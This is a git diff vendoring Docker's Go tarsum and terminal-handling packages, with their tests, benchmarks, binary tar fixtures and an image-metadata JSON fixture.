nil { + t.Errorf("failed to open %s: %s", layer.filename, err) + continue + } + } else if layer.options != nil { + fh = sizedTar(*layer.options) + } else { + // What else is there to test? + t.Errorf("what to do with %#v", layer) + continue + } + if file, ok := fh.(*os.File); ok { + defer file.Close() + } + + var ts TarSum + if layer.hash == nil { + // double negatives! + ts, err = NewTarSum(fh, !layer.gzip, layer.version) + } else { + ts, err = NewTarSumHash(fh, !layer.gzip, layer.version, layer.hash) + } + if err != nil { + t.Errorf("%q :: %q", err, layer.filename) + continue + } + + // Read variable number of bytes to test dynamic buffer + dBuf := make([]byte, 1) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read 1B from %s: %s", layer.filename, err) + continue + } + dBuf = make([]byte, 16*1024) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read 16KB from %s: %s", layer.filename, err) + continue + } + + // Read and discard remaining bytes + _, err = io.Copy(ioutil.Discard, ts) + if err != nil { + t.Errorf("failed to copy from %s: %s", layer.filename, err) + continue + } + var gotSum string + if len(layer.jsonfile) > 0 { + jfh, err := os.Open(layer.jsonfile) + if err != nil { + t.Errorf("failed to open %s: %s", layer.jsonfile, err) + continue + } + defer jfh.Close() + + buf, err := ioutil.ReadAll(jfh) + if err != nil { + t.Errorf("failed to readAll %s: %s", layer.jsonfile, err) + continue + } + gotSum = ts.Sum(buf) + } else { + gotSum = ts.Sum(nil) + } + + if layer.tarsum != gotSum { + t.Errorf("expecting [%s], but got [%s]", layer.tarsum, gotSum) + } + var expectedHashName string + if layer.hash != nil { + expectedHashName = layer.hash.Name() + } else { + expectedHashName = DefaultTHash.Name() + } + if expectedHashName != ts.Hash().Name() { + t.Errorf("expecting hash [%v], but got [%s]", expectedHashName, ts.Hash().Name()) + } + } +} + +func TestIteration(t *testing.T) { + headerTests := []struct { + expectedSum string // 
TODO(vbatts) it would be nice to get individual sums of each + version Version + hdr *tar.Header + data []byte + }{ + { + "tarsum+sha256:626c4a2e9a467d65c33ae81f7f3dedd4de8ccaee72af73223c4bc4718cbc7bbd", + Version0, + &tar.Header{ + Name: "file.txt", + Size: 0, + Typeflag: tar.TypeReg, + Devminor: 0, + Devmajor: 0, + }, + []byte(""), + }, + { + "tarsum.dev+sha256:6ffd43a1573a9913325b4918e124ee982a99c0f3cba90fc032a65f5e20bdd465", + VersionDev, + &tar.Header{ + Name: "file.txt", + Size: 0, + Typeflag: tar.TypeReg, + Devminor: 0, + Devmajor: 0, + }, + []byte(""), + }, + { + "tarsum.dev+sha256:b38166c059e11fb77bef30bf16fba7584446e80fcc156ff46d47e36c5305d8ef", + VersionDev, + &tar.Header{ + Name: "another.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Devminor: 0, + Devmajor: 0, + }, + []byte("test"), + }, + { + "tarsum.dev+sha256:4cc2e71ac5d31833ab2be9b4f7842a14ce595ec96a37af4ed08f87bc374228cd", + VersionDev, + &tar.Header{ + Name: "xattrs.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Xattrs: map[string]string{ + "user.key1": "value1", + "user.key2": "value2", + }, + }, + []byte("test"), + }, + { + "tarsum.dev+sha256:65f4284fa32c0d4112dd93c3637697805866415b570587e4fd266af241503760", + VersionDev, + &tar.Header{ + Name: "xattrs.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Xattrs: map[string]string{ + "user.KEY1": "value1", // adding different case to ensure different sum + "user.key2": "value2", + }, + }, + []byte("test"), + }, + { + "tarsum+sha256:c12bb6f1303a9ddbf4576c52da74973c00d14c109bcfa76b708d5da1154a07fa", + Version0, + &tar.Header{ + Name: "xattrs.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Xattrs: map[string]string{ + "user.NOT": "CALCULATED", + }, + }, + []byte("test"), + }, + } + for 
_, htest := range headerTests { + s, err := renderSumForHeader(htest.version, htest.hdr, htest.data) + if err != nil { + t.Fatal(err) + } + + if s != htest.expectedSum { + t.Errorf("expected sum: %q, got: %q", htest.expectedSum, s) + } + } + +} + +func renderSumForHeader(v Version, h *tar.Header, data []byte) (string, error) { + buf := bytes.NewBuffer(nil) + // first build our test tar + tw := tar.NewWriter(buf) + if err := tw.WriteHeader(h); err != nil { + return "", err + } + if _, err := tw.Write(data); err != nil { + return "", err + } + tw.Close() + + ts, err := NewTarSum(buf, true, v) + if err != nil { + return "", err + } + tr := tar.NewReader(ts) + for { + hdr, err := tr.Next() + if hdr == nil || err == io.EOF { + // Signals the end of the archive. + break + } + if err != nil { + return "", err + } + if _, err = io.Copy(ioutil.Discard, tr); err != nil { + return "", err + } + } + return ts.Sum(nil), nil +} + +func Benchmark9kTar(b *testing.B) { + buf := bytes.NewBuffer([]byte{}) + fh, err := os.Open("testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar") + if err != nil { + b.Error(err) + return + } + defer fh.Close() + + n, err := io.Copy(buf, fh) + if err != nil { + b.Error(err) + return + } + + reader := bytes.NewReader(buf.Bytes()) + + b.SetBytes(n) + b.ResetTimer() + for i := 0; i < b.N; i++ { + reader.Seek(0, 0) + ts, err := NewTarSum(reader, true, Version0) + if err != nil { + b.Error(err) + return + } + io.Copy(ioutil.Discard, ts) + ts.Sum(nil) + } +} + +func Benchmark9kTarGzip(b *testing.B) { + buf := bytes.NewBuffer([]byte{}) + fh, err := os.Open("testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar") + if err != nil { + b.Error(err) + return + } + defer fh.Close() + + n, err := io.Copy(buf, fh) + if err != nil { + b.Error(err) + return + } + + reader := bytes.NewReader(buf.Bytes()) + + b.SetBytes(n) + b.ResetTimer() + for i := 0; i < b.N; i++ { + reader.Seek(0, 0) + ts, err := 
NewTarSum(reader, false, Version0) + if err != nil { + b.Error(err) + return + } + io.Copy(ioutil.Discard, ts) + ts.Sum(nil) + } +} + +// this is a single big file in the tar archive +func Benchmark1mbSingleFileTar(b *testing.B) { + benchmarkTar(b, sizedOptions{1, 1024 * 1024, true, true}, false) +} + +// this is a single big file in the tar archive +func Benchmark1mbSingleFileTarGzip(b *testing.B) { + benchmarkTar(b, sizedOptions{1, 1024 * 1024, true, true}, true) +} + +// this is 1024 1k files in the tar archive +func Benchmark1kFilesTar(b *testing.B) { + benchmarkTar(b, sizedOptions{1024, 1024, true, true}, false) +} + +// this is 1024 1k files in the tar archive +func Benchmark1kFilesTarGzip(b *testing.B) { + benchmarkTar(b, sizedOptions{1024, 1024, true, true}, true) +} + +func benchmarkTar(b *testing.B, opts sizedOptions, isGzip bool) { + var fh *os.File + tarReader := sizedTar(opts) + if br, ok := tarReader.(*os.File); ok { + fh = br + } + defer os.Remove(fh.Name()) + defer fh.Close() + + b.SetBytes(opts.size * opts.num) + b.ResetTimer() + for i := 0; i < b.N; i++ { + ts, err := NewTarSum(fh, !isGzip, Version0) + if err != nil { + b.Error(err) + return + } + io.Copy(ioutil.Discard, ts) + ts.Sum(nil) + fh.Seek(0, 0) + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json new file mode 100644 index 0000000000..48e2af349c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json @@ -0,0 +1 @@ 
+{"id":"46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457","parent":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","created":"2014-04-07T02:45:52.610504484Z","container":"e0f07f8d72cae171a3dcc35859960e7e956e0628bce6fedc4122bf55b2c287c7","container_config":{"Hostname":"88807319f25e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sh","-c","sed -ri 's/^(%wheel.*)(ALL)$/\\1NOPASSWD: \\2/' /etc/sudoers"],"Image":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"docker_version":"0.9.1-dev","config":{"Hostname":"88807319f25e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":null,"Image":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"architecture":"amd64","os":"linux","Size":3425} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar new file mode 100644 index 0000000000000000000000000000000000000000..dfd5c204aea77673f13fdd2f81cb4af1c155c00c GIT binary patch literal 9216 zcmeHMYfsx)8s=;H6|bl&iYAZ?p-5<1$(y*vYHk~c?XX{vu}|fzRr1|&zyvK1! 
zQq)nWWVPA}63Myvy*}^F5Qtg*V8=g=M!Ru&adFTnf40B*^q|=~Z#CM@#>M%EgGRH_ zXtfULV#j(J_Jz`34wZgZ*0ym!%kRHL9{_(p&BZRoHJYu)<>loz?$!PU{9Bjp<^i?p zS)Tg!r=9Az$G@(0Ao6^75%A;qpMSV)ukcqQn%1X5y|oh!_xLmZX`y%GUBmQG;D6af z{a@yPg@1D=8t(B&ZtcXgE2ck=f9pf*x&ANlU$J}L#UB59rsJ=#>(otde**vZ1?PXJ z)y|dMh8z!Kfh=;zN!B|J)*y8)L$Hbq5c2K_rK=l{{8R8czxwV#$Odd zDsuJ8oS)h8`+U3IsNVOszdy8F?XCC!X1jHMK)Xr!XT8koFP{Hz-;!IxPhJ$Ib48h# zYv~t}ms6n-7Nk?ki-cxgF4IDhpT@D51d2R$2x=V)%F|Svhif#KI>gHaB|@O7JU(A% zo>KEP56(cuboN&-&LROexgfmf&txD1^0c9NNVQI5N~dNwm64!nnnQFH317=JF`{vu zi^$WUtCWHQq4Y!Yy@W{oRoV29sUd<=@!~sJ;!ok8>_qYfz|Ch12+9P6$8i`#qvqS zhsLT-8QL!zwhRx(aXaYF&PwD5LLOm%T#Ds>) z{YV0A>qPL*aFLnz9*nfyl@!I3_Ss=Y=MKNEA zG8|$lPj#9`#(W1sgCgK@f)P?2A)0uPB8Gf6TLITOAl@|29e$jAvBox=W-QCrr59N% zKg$7Xy=69F7QR_X7D_-i2hs*J)6%&RIBr9LDPPP_-? z-X`DPuwzY(j+Gk=rWL_Msfvvp-prW$3W(MwPPgEZO^EI!{*XIAuLp zlpj9k85vO{{2kR4hD{4c;~{+QmhNVfq;xeepJc>QQ@QJfEkdQVBbPJuiA~nsv9l~O zrN&UpxC9i`6;rQ>v?7%WUrr@(gXOs4JE=IN=}4(?RS=2GEd9-ogTEiuP>Fqyb6;vM ziV-Q;Z|ZT?Vz^rPk?`^}6a`cC_=9V1=*>jc&y0jq{h|=m&BK+Jpv}ea1?sKVi^Gj` zk<9K*;4?gK^?Jl6-g0L4kQcX>OZUHi{>Odi#u~f!gnqSdCpW{f zGr2q31WO6O$i;nz9#NH-D^8Rv6Xcv%XFkhmyBsZ;8k2ftd;fPtN1v+`G zPRv~5E)wm1y}~(Py9GwK;`;9K2C_2#(Rc=qFBTa z>?ZUNHvSmq9G9)M%0u+CW!J=jv1~Clz-avUIImk%<&=a9uI;2EY~~stiCKTsh|Oow<5; z$eY1%WV!B_?iFikc)C2TV46YQucl=WfmM#jY|_4sK>Njf)j#u#Y{x@V_A!c2o<`D? 
zX*2YQ4A)U054Qh4y3hVk?0?5^Us~rh*TViU9vl!r009ILKmY**5I_I{1Q0*~0R#|0 Y009ILKmY**5I_I{1Q0*~fqxTt0{2EK)Bpeg literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar new file mode 100644 index 0000000000000000000000000000000000000000..7b5c04a9644808851fcccab5c3c240bf342abd93 GIT binary patch literal 10240 zcmeIuF%E+;425COJw=XS2L~?Dp<74P5hRe1I+e8NZ(w35>V(Abzr};)_<@(2e`|Ha`Z>GG~@_KYd${~ON w0tg_000IagfB*srAbVE5xzPBd+@To)G|2840byWhU|?oqf;;~Mb02E{2kHRk de~R-YhD)#rjPU%AB}7JrMnhmU1V%^*0091(G-Ch& literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go new file mode 100644 index 0000000000..2882286854 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go @@ -0,0 +1,150 @@ +package tarsum + +import ( + "archive/tar" + "errors" + "sort" + "strconv" + "strings" +) + +// Version is used for versioning of the TarSum algorithm +// based on the prefix of the hash used +// i.e. "tarsum+sha256:e58fcf7418d4390dec8e8fb69d88c06ec07039d651fedd3aa72af9972e7d046b" +type Version int + +// Prefix of "tarsum" +const ( + Version0 Version = iota + Version1 + // VersionDev this constant will be either the latest or an unsettled next-version of the TarSum calculation + VersionDev +) + +// VersionLabelForChecksum returns the label for the given tarsum +// checksum, i.e., everything before the first `+` character in +// the string or an empty string if no label separator is found. +func VersionLabelForChecksum(checksum string) string { + // Checksums are in the form: {versionLabel}+{hashID}:{hex} + sepIndex := strings.Index(checksum, "+") + if sepIndex < 0 { + return "" + } + return checksum[:sepIndex] +} + +// GetVersions gets a list of all known tarsum versions. 
+func GetVersions() []Version { + v := []Version{} + for k := range tarSumVersions { + v = append(v, k) + } + return v +} + +var ( + tarSumVersions = map[Version]string{ + Version0: "tarsum", + Version1: "tarsum.v1", + VersionDev: "tarsum.dev", + } + tarSumVersionsByName = map[string]Version{ + "tarsum": Version0, + "tarsum.v1": Version1, + "tarsum.dev": VersionDev, + } +) + +func (tsv Version) String() string { + return tarSumVersions[tsv] +} + +// GetVersionFromTarsum returns the Version from the provided string. +func GetVersionFromTarsum(tarsum string) (Version, error) { + tsv := tarsum + if strings.Contains(tarsum, "+") { + tsv = strings.SplitN(tarsum, "+", 2)[0] + } + for v, s := range tarSumVersions { + if s == tsv { + return v, nil + } + } + return -1, ErrNotVersion +} + +// Errors that may be returned by functions in this package +var ( + ErrNotVersion = errors.New("string does not include a TarSum Version") + ErrVersionNotImplemented = errors.New("TarSum Version is not yet implemented") +) + +// tarHeaderSelector is the interface which different versions +// of tarsum should use for selecting and ordering tar headers +// for each item in the archive. 
+type tarHeaderSelector interface { + selectHeaders(h *tar.Header) (orderedHeaders [][2]string) +} + +type tarHeaderSelectFunc func(h *tar.Header) (orderedHeaders [][2]string) + +func (f tarHeaderSelectFunc) selectHeaders(h *tar.Header) (orderedHeaders [][2]string) { + return f(h) +} + +func v0TarHeaderSelect(h *tar.Header) (orderedHeaders [][2]string) { + return [][2]string{ + {"name", h.Name}, + {"mode", strconv.FormatInt(h.Mode, 10)}, + {"uid", strconv.Itoa(h.Uid)}, + {"gid", strconv.Itoa(h.Gid)}, + {"size", strconv.FormatInt(h.Size, 10)}, + {"mtime", strconv.FormatInt(h.ModTime.UTC().Unix(), 10)}, + {"typeflag", string([]byte{h.Typeflag})}, + {"linkname", h.Linkname}, + {"uname", h.Uname}, + {"gname", h.Gname}, + {"devmajor", strconv.FormatInt(h.Devmajor, 10)}, + {"devminor", strconv.FormatInt(h.Devminor, 10)}, + } +} + +func v1TarHeaderSelect(h *tar.Header) (orderedHeaders [][2]string) { + // Get extended attributes. + xAttrKeys := make([]string, len(h.Xattrs)) + for k := range h.Xattrs { + xAttrKeys = append(xAttrKeys, k) + } + sort.Strings(xAttrKeys) + + // Make the slice with enough capacity to hold the 11 basic headers + // we want from the v0 selector plus however many xattrs we have. + orderedHeaders = make([][2]string, 0, 11+len(xAttrKeys)) + + // Copy all headers from v0 excluding the 'mtime' header (the 5th element). + v0headers := v0TarHeaderSelect(h) + orderedHeaders = append(orderedHeaders, v0headers[0:5]...) + orderedHeaders = append(orderedHeaders, v0headers[6:]...) + + // Finally, append the sorted xattrs. 
+ for _, k := range xAttrKeys { + orderedHeaders = append(orderedHeaders, [2]string{k, h.Xattrs[k]}) + } + + return +} + +var registeredHeaderSelectors = map[Version]tarHeaderSelectFunc{ + Version0: v0TarHeaderSelect, + Version1: v1TarHeaderSelect, + VersionDev: v1TarHeaderSelect, +} + +func getTarHeaderSelector(v Version) (tarHeaderSelector, error) { + headerSelector, ok := registeredHeaderSelectors[v] + if !ok { + return nil, ErrVersionNotImplemented + } + + return headerSelector, nil +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go new file mode 100644 index 0000000000..88e0a5783c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go @@ -0,0 +1,98 @@ +package tarsum + +import ( + "testing" +) + +func TestVersionLabelForChecksum(t *testing.T) { + version := VersionLabelForChecksum("tarsum+sha256:deadbeef") + if version != "tarsum" { + t.Fatalf("Version should have been 'tarsum', was %v", version) + } + version = VersionLabelForChecksum("tarsum.v1+sha256:deadbeef") + if version != "tarsum.v1" { + t.Fatalf("Version should have been 'tarsum.v1', was %v", version) + } + version = VersionLabelForChecksum("something+somethingelse") + if version != "something" { + t.Fatalf("Version should have been 'something', was %v", version) + } + version = VersionLabelForChecksum("invalidChecksum") + if version != "" { + t.Fatalf("Version should have been empty, was %v", version) + } +} + +func TestVersion(t *testing.T) { + expected := "tarsum" + var v Version + if v.String() != expected { + t.Errorf("expected %q, got %q", expected, v.String()) + } + + expected = "tarsum.v1" + v = 1 + if v.String() != expected { + t.Errorf("expected %q, got %q", expected, v.String()) + } + + expected = "tarsum.dev" + v = 2 + if v.String() != expected { + t.Errorf("expected %q, got %q", expected, v.String()) + } +} + +func TestGetVersion(t *testing.T) { + testSet := []struct { + 
Str string + Expected Version + }{ + {"tarsum+sha256:e58fcf7418d4390dec8e8fb69d88c06ec07039d651fedd3aa72af9972e7d046b", Version0}, + {"tarsum+sha256", Version0}, + {"tarsum", Version0}, + {"tarsum.dev", VersionDev}, + {"tarsum.dev+sha256:deadbeef", VersionDev}, + } + + for _, ts := range testSet { + v, err := GetVersionFromTarsum(ts.Str) + if err != nil { + t.Fatalf("%q : %s", err, ts.Str) + } + if v != ts.Expected { + t.Errorf("expected %d (%q), got %d (%q)", ts.Expected, ts.Expected, v, v) + } + } + + // test one that does not exist, to ensure it errors + str := "weak+md5:abcdeabcde" + _, err := GetVersionFromTarsum(str) + if err != ErrNotVersion { + t.Fatalf("%q : %s", err, str) + } +} + +func TestGetVersions(t *testing.T) { + expected := []Version{ + Version0, + Version1, + VersionDev, + } + versions := GetVersions() + if len(versions) != len(expected) { + t.Fatalf("Expected %v versions, got %v", len(expected), len(versions)) + } + if !containsVersion(versions, expected[0]) || !containsVersion(versions, expected[1]) || !containsVersion(versions, expected[2]) { + t.Fatalf("Expected [%v], got [%v]", expected, versions) + } +} + +func containsVersion(versions []Version, version Version) bool { + for _, v := range versions { + if v == version { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go new file mode 100644 index 0000000000..9727ecde3e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go @@ -0,0 +1,22 @@ +package tarsum + +import ( + "io" +) + +type writeCloseFlusher interface { + io.WriteCloser + Flush() error +} + +type nopCloseFlusher struct { + io.Writer +} + +func (n *nopCloseFlusher) Close() error { + return nil +} + +func (n *nopCloseFlusher) Flush() error { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/ascii.go b/vendor/github.com/docker/docker/pkg/term/ascii.go new file mode 
100644 index 0000000000..f5262bccf5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/ascii.go @@ -0,0 +1,66 @@ +package term + +import ( + "fmt" + "strings" +) + +// ASCII list the possible supported ASCII key sequence +var ASCII = []string{ + "ctrl-@", + "ctrl-a", + "ctrl-b", + "ctrl-c", + "ctrl-d", + "ctrl-e", + "ctrl-f", + "ctrl-g", + "ctrl-h", + "ctrl-i", + "ctrl-j", + "ctrl-k", + "ctrl-l", + "ctrl-m", + "ctrl-n", + "ctrl-o", + "ctrl-p", + "ctrl-q", + "ctrl-r", + "ctrl-s", + "ctrl-t", + "ctrl-u", + "ctrl-v", + "ctrl-w", + "ctrl-x", + "ctrl-y", + "ctrl-z", + "ctrl-[", + "ctrl-\\", + "ctrl-]", + "ctrl-^", + "ctrl-_", +} + +// ToBytes converts a string representing a suite of key-sequence to the corresponding ASCII code. +func ToBytes(keys string) ([]byte, error) { + codes := []byte{} +next: + for _, key := range strings.Split(keys, ",") { + if len(key) != 1 { + for code, ctrl := range ASCII { + if ctrl == key { + codes = append(codes, byte(code)) + continue next + } + } + if key == "DEL" { + codes = append(codes, 127) + } else { + return nil, fmt.Errorf("Unknown character: '%s'", key) + } + } else { + codes = append(codes, byte(key[0])) + } + } + return codes, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/ascii_test.go b/vendor/github.com/docker/docker/pkg/term/ascii_test.go new file mode 100644 index 0000000000..4a1e7f302c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/ascii_test.go @@ -0,0 +1,43 @@ +package term + +import "testing" + +func TestToBytes(t *testing.T) { + codes, err := ToBytes("ctrl-a,a") + if err != nil { + t.Fatal(err) + } + if len(codes) != 2 { + t.Fatalf("Expected 2 codes, got %d", len(codes)) + } + if codes[0] != 1 || codes[1] != 97 { + t.Fatalf("Expected '1' '97', got '%d' '%d'", codes[0], codes[1]) + } + + codes, err = ToBytes("shift-z") + if err == nil { + t.Fatalf("Expected error, got none") + } + + codes, err = ToBytes("ctrl-@,ctrl-[,~,ctrl-o") + if err != nil { + t.Fatal(err) + } + if len(codes) 
!= 4 { + t.Fatalf("Expected 4 codes, got %d", len(codes)) + } + if codes[0] != 0 || codes[1] != 27 || codes[2] != 126 || codes[3] != 15 { + t.Fatalf("Expected '0' '27' '126', '15', got '%d' '%d' '%d' '%d'", codes[0], codes[1], codes[2], codes[3]) + } + + codes, err = ToBytes("DEL,+") + if err != nil { + t.Fatal(err) + } + if len(codes) != 2 { + t.Fatalf("Expected 2 codes, got %d", len(codes)) + } + if codes[0] != 127 || codes[1] != 43 { + t.Fatalf("Expected '127 '43'', got '%d' '%d'", codes[0], codes[1]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go new file mode 100644 index 0000000000..59dac5ba8e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go @@ -0,0 +1,50 @@ +// +build linux,cgo + +package term + +import ( + "syscall" + "unsafe" +) + +// #include +import "C" + +// Termios is the Unix API for terminal I/O. +// It is passthrough for syscall.Termios in order to make it portable with +// other platforms where it is not available or handled differently. +type Termios syscall.Termios + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. 
+func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if err := tcget(fd, &oldState.termios); err != 0 { + return nil, err + } + + newState := oldState.termios + + C.cfmakeraw((*C.struct_termios)(unsafe.Pointer(&newState))) + if err := tcset(fd, &newState); err != 0 { + return nil, err + } + return &oldState, nil +} + +func tcget(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_other.go b/vendor/github.com/docker/docker/pkg/term/tc_other.go new file mode 100644 index 0000000000..750d7c3f60 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc_other.go @@ -0,0 +1,20 @@ +// +build !windows +// +build !linux !cgo +// +build !solaris !cgo + +package term + +import ( + "syscall" + "unsafe" +) + +func tcget(fd uintptr, p *Termios) syscall.Errno { + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p))) + return err +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p))) + return err +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go new file mode 100644 index 0000000000..c9139d0ca8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go @@ -0,0 +1,63 @@ +// +build solaris,cgo + +package term + +import ( + "syscall" + "unsafe" +) + +// #include +import "C" + +// Termios is the Unix API for terminal I/O. 
+// It is passthrough for syscall.Termios in order to make it portable with +// other platforms where it is not available or handled differently. +type Termios syscall.Termios + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if err := tcget(fd, &oldState.termios); err != 0 { + return nil, err + } + + newState := oldState.termios + + newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON | syscall.IXANY) + newState.Oflag &^= syscall.OPOST + newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) + newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) + newState.Cflag |= syscall.CS8 + + /* + VMIN is the minimum number of characters that needs to be read in non-canonical mode for it to be returned + Since VMIN is overloaded with another element in canonical mode when we switch modes it defaults to 4. It + needs to be explicitly set to 1. 
+ */ + newState.Cc[C.VMIN] = 1 + newState.Cc[C.VTIME] = 0 + + if err := tcset(fd, &newState); err != 0 { + return nil, err + } + return &oldState, nil +} + +func tcget(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} diff --git a/vendor/github.com/docker/docker/pkg/term/term.go b/vendor/github.com/docker/docker/pkg/term/term.go new file mode 100644 index 0000000000..fe59faa949 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term.go @@ -0,0 +1,123 @@ +// +build !windows + +// Package term provides structures and helper functions to work with +// terminal (state, sizes). +package term + +import ( + "errors" + "fmt" + "io" + "os" + "os/signal" + "syscall" +) + +var ( + // ErrInvalidState is returned if the state of the terminal is invalid. + ErrInvalidState = errors.New("Invalid terminal state") +) + +// State represents the state of the terminal. +type State struct { + termios Termios +} + +// Winsize represents the size of the terminal window. +type Winsize struct { + Height uint16 + Width uint16 + x uint16 + y uint16 +} + +// StdStreams returns the standard streams (stdin, stdout, stedrr). +func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { + return os.Stdin, os.Stdout, os.Stderr +} + +// GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal. +func GetFdInfo(in interface{}) (uintptr, bool) { + var inFd uintptr + var isTerminalIn bool + if file, ok := in.(*os.File); ok { + inFd = file.Fd() + isTerminalIn = IsTerminal(inFd) + } + return inFd, isTerminalIn +} + +// IsTerminal returns true if the given file descriptor is a terminal. 
+func IsTerminal(fd uintptr) bool { + var termios Termios + return tcget(fd, &termios) == 0 +} + +// RestoreTerminal restores the terminal connected to the given file descriptor +// to a previous state. +func RestoreTerminal(fd uintptr, state *State) error { + if state == nil { + return ErrInvalidState + } + if err := tcset(fd, &state.termios); err != 0 { + return err + } + return nil +} + +// SaveState saves the state of the terminal connected to the given file descriptor. +func SaveState(fd uintptr) (*State, error) { + var oldState State + if err := tcget(fd, &oldState.termios); err != 0 { + return nil, err + } + + return &oldState, nil +} + +// DisableEcho applies the specified state to the terminal connected to the file +// descriptor, with echo disabled. +func DisableEcho(fd uintptr, state *State) error { + newState := state.termios + newState.Lflag &^= syscall.ECHO + + if err := tcset(fd, &newState); err != 0 { + return err + } + handleInterrupt(fd, state) + return nil +} + +// SetRawTerminal puts the terminal connected to the given 